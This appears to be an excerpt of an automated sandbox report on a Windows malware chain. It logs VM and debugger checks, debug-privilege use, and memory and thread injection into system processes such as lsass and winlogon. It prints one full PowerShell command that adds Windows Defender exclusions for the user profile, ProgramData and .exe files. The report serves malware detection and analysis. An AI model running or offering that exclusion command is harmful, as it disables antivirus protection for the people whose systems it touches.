Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 595296
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 595187
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 595077
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 594968
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 594859
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 594750
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 594638
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 594530
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 594421
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 594311
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 594203
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 594093
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 593984
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 593875
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 593765
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 593656
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 593465
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 593324
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 593216
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 593099
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 592979
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 592867
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 592762
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Thread delayed: delay time: 922337203685477

Source: C:\PerfDll\hyperProviderSavesinto.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: GargantuaN.exe, 00000001.00000003.1641039969.0000000003502000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
Source: wscript.exe, 00000003.00000003.1698379391.000000000332C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}f
Source: hyperProviderSavesinto.exe, 00000008.00000002.1751357469.000000001BB39000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}K
Source: KZcLqgnLvRf.exe, 00000014.00000002.2908332950.000000001B8A0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllll:
Source: wscript.exe, 00000003.00000003.1698379391.000000000332C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\C
Source: PING.EXE, 0000002D.00000002.1838656558.000002359AF59000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllhh

Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\System32\dialer.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe

Code function: 0_2_00007FF7F4D86900 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00007FF7F4D86900

Contains functionality to read the PEB

Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe

Code function: 1_2_00D77DEE mov eax, dword ptr fs:[00000030h]

1_2_00D77DEE

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe

Code function: 0_2_00007FF7F4D94170 GetProcessHeap,

0_2_00007FF7F4D94170

Enables debug privileges

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\PerfDll\hyperProviderSavesinto.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	Process token adjusted: Debug
Source: C:\Windows\System32\dialer.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D86900 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF7F4D86900
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D86AE4 SetUnhandledExceptionFilter,	0_2_00007FF7F4D86AE4
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D85CA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF7F4D85CA0
Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe	Code function: 0_2_00007FF7F4D8AC28 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF7F4D8AC28
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D6F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00D6F838
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D6F9D5 SetUnhandledExceptionFilter,	1_2_00D6F9D5
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D6FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_00D6FBCA
Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exe	Code function: 1_2_00D78EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_00D78EBD
Source: C:\Windows\System32\conhost.exe	Code function: 7_2_000001B0BB98D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_000001B0BB98D2A4
Source: C:\Windows\System32\conhost.exe	Code function: 7_2_000001B0BB987D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_000001B0BB987D90
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Code function: 9_2_00000216D26F7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_00000216D26F7D90
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Code function: 9_2_00000216D26FD2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_00000216D26FD2A4
Source: C:\Windows\System32\cmd.exe	Code function: 38_2_00000150E93ED2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	38_2_00000150E93ED2A4
Source: C:\Windows\System32\cmd.exe	Code function: 38_2_00000150E93E7D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	38_2_00000150E93E7D90
Source: C:\Windows\System32\conhost.exe	Code function: 40_2_00000267FCE97D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	40_2_00000267FCE97D90
Source: C:\Windows\System32\conhost.exe	Code function: 40_2_00000267FCE9D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	40_2_00000267FCE9D2A4
Source: C:\Windows\System32\PING.EXE	Code function: 45_2_000002359B52D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	45_2_000002359B52D2A4
Source: C:\Windows\System32\PING.EXE	Code function: 45_2_000002359B527D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	45_2_000002359B527D90
Source: C:\Windows\System32\winlogon.exe	Code function: 49_2_00000225DC647D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	49_2_00000225DC647D90
Source: C:\Windows\System32\winlogon.exe	Code function: 49_2_00000225DC64D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	49_2_00000225DC64D2A4

Source: C:\PerfDll\hyperProviderSavesinto.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force			Jump to behavior

Allocates memory in foreign processes

Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\winlogon.exe base: 225DC610000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\lsass.exe base: 202C0AB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2A6612D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dwm.exe base: 2BAAF190000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 26A87990000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 17953770000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2295D530000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 253067D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1845B380000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1D559040000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 241A9E70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1CD73160000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Recovery\RuntimeBroker.exe base: 1300000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2824E860000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 21B473C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2086F9D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 17183BC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 23FD3F70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1D2A4150000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 275BDF30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1AAC0260000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 203C9F30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1B5644B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1C004F60000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 24E2AB40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2644ADB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\spoolsv.exe base: 1990000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 20D25DA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 26EF5350000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2A7F0D60000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 23D0FFB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1B1C2570000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2108BCE0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 29166940000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1988D570000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 13869B40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1E1CC740000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2855DA70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2BF199D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 15AF3890000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 21A03B80000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\sihost.exe base: 1CD40E40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 151A6530000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 19E29CE0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 17D7B150000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1BE621A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2252F480000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 184683D0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\explorer.exe base: C350000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1972E260000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dasHost.exe base: 2246C5E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 221D5930000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC690000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1D178970000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1A633B40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 2928D0A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\smartscreen.exe base: 1A22A640000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 21C6CF30000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF641A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\audiodg.exe base: 1D349350000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 23B60D80000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1F22F7C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 22399A10000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1BFFC960000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1FBA3250000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 1D4C2220000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 1F2989C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\dllhost.exe base: 25EEFAE0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 23839DB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 17644530000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1B42C420000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 1BCF4530000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 1B0BB950000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\PerfDll\hyperProviderSavesinto.exe base: 15C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 216D26C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe base: 1E7C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe base: 2D90000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Recovery\WmiPrvSE.exe base: 1B4E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Recovery\WmiPrvSE.exe base: 13C0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\cmd.exe base: 150E9040000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\conhost.exe base: 267FCE60000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\PING.EXE base: 2359B4F0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Recovery\RuntimeBroker.exe base: 1BD70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Recovery\RuntimeBroker.exe base: 1360000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe base: BB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe base: E60000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Program Files\Windows Defender\MpCmdRun.exe base: 289066A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 1E205C10000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exe	Memory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 1E2066A0000 protect: page execute and read and write

Contains functionality to inject code into remote processes

Source: C:\Windows\System32\dialer.exe

Code function: 46_2_0000000140001C88 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,

46_2_0000000140001C88

Creates a thread in another existing process (thread injection)

Source: C:\Windows\System32\dialer.exe	Thread created: C:\Windows\System32\winlogon.exe EIP: DC61273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C0AB273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 612D273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: AF19273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8799273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5377273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5D53273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 67D273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5B38273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: EBFD273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5904273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A9E7273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 7316273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 130273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4E86273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 473C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6F9D273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 83BC273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: D3F7273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A415273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: BDF3273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C026273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C9F3273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 644B273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 7B2A273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4F6273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2AB4273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4ADB273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 199273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 25DA273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F535273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F0D6273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: FFB273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C257273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8BCE273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6694273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 13EF273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8D57273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 69B4273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: CC74273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5DA7273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 199D273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F389273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 3B8273C
